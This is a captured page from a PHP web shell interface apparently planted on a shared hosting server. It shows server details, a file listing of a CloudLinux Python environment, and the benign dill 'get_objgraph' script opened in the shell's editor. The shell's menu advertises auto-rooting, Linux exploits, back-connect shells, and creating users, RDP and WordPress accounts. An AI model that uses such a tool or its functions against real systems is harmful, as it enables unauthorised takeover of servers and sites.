Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.208
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
cloudlinux /
venv /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
Activate.ps1
8.82
KB
-rw-r--r--
activate
1.65
KB
-rw-r--r--
activate.csh
915
B
-rw-r--r--
activate.fish
2.14
KB
-rw-r--r--
alembic
202
B
-rwxr-xr-x
cagefs_enter_site.py
1.83
KB
-rwxr-xr-x
cagefsctl_user.py
12.89
KB
-rwxr-xr-x
chardetect
210
B
-rwxr-xr-x
cl_sysctl
4.51
KB
-rwxr-xr-x
clcpapi
3.64
KB
-rwxr-xr-x
coverage
204
B
-rwxr-xr-x
coverage-3.11
204
B
-rwxr-xr-x
coverage3
204
B
-rwxr-xr-x
cpanel-dbmapping
3.83
KB
-rwxr-xr-x
crontab-user-wrapper.py
2.46
KB
-rwxr-xr-x
da_suid_caller.py
686
B
-rw-r--r--
detect-requirements
211
B
-rwxr-xr-x
dodgy
197
B
-rwxr-xr-x
epylint
208
B
-rwxr-xr-x
f2py
205
B
-rwxr-xr-x
f2py3
205
B
-rwxr-xr-x
f2py3.11
205
B
-rwxr-xr-x
flake8
203
B
-rwxr-xr-x
futurize
204
B
-rwxr-xr-x
get_gprof
1.84
KB
-rwxr-xr-x
get_objgraph
1.63
KB
-rwxr-xr-x
isort
198
B
-rwxr-xr-x
isort-identify-imports
232
B
-rwxr-xr-x
jsonschema
202
B
-rwxr-xr-x
lvestats_config_reader.py
1.12
KB
-rw-r--r--
mako-render
202
B
-rwxr-xr-x
normalizer
233
B
-rwxr-xr-x
pasteurize
206
B
-rwxr-xr-x
pip
237
B
-rwxr-xr-x
pip3
237
B
-rwxr-xr-x
pip3.11
237
B
-rwxr-xr-x
plesk_suid_caller.py
905
B
-rw-r--r--
prospector
202
B
-rwxr-xr-x
py.test
210
B
-rwxr-xr-x
pycodestyle
201
B
-rwxr-xr-x
pydocstyle
202
B
-rwxr-xr-x
pyflakes
200
B
-rwxr-xr-x
pylint
206
B
-rwxr-xr-x
pylint-config
222
B
-rwxr-xr-x
pyreverse
212
B
-rwxr-xr-x
pysemver
198
B
-rwxr-xr-x
pytest
210
B
-rwxr-xr-x
python
15.59
KB
-rwxr-xr-x
python3
15.59
KB
-rwxr-xr-x
python3.11
15.59
KB
-rwxr-xr-x
raven
208
B
-rwxr-xr-x
symilar
208
B
-rwxr-xr-x
tap
196
B
-rwxr-xr-x
tappy
196
B
-rwxr-xr-x
undill
603
B
-rwxr-xr-x
virtualenv
227
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get_objgraph
#!/opt/cloudlinux/venv/bin/python3 # # Author: Mike McKerns (mmckerns @caltech and @uqfoundation) # Copyright (c) 2008-2016 California Institute of Technology. # Copyright (c) 2016-2023 The Uncertainty Quantification Foundation. # License: 3-clause BSD. The full license text is available at: # - https://github.com/uqfoundation/dill/blob/master/LICENSE """ display the reference paths for objects in ``dill.types`` or a .pkl file Notes: the generated image is useful in showing the pointer references in objects that are or can be pickled. Any object in ``dill.objects`` listed in ``dill.load_types(picklable=True, unpicklable=True)`` works. Examples:: $ get_objgraph ArrayType Image generated as ArrayType.png """ import dill as pickle #pickle.debug.trace(True) #import pickle # get all objects for testing from dill import load_types load_types(pickleable=True,unpickleable=True) from dill import objects if __name__ == "__main__": import sys if len(sys.argv) != 2: print ("Please provide exactly one file or type name (e.g. 'IntType')") msg = "\n" for objtype in list(objects.keys())[:40]: msg += objtype + ', ' print (msg + "...") else: objtype = str(sys.argv[-1]) try: obj = objects[objtype] except KeyError: obj = pickle.load(open(objtype,'rb')) import os objtype = os.path.splitext(objtype)[0] try: import objgraph objgraph.show_refs(obj, filename=objtype+'.png') except ImportError: print ("Please install 'objgraph' to view object graphs") # EOF
Close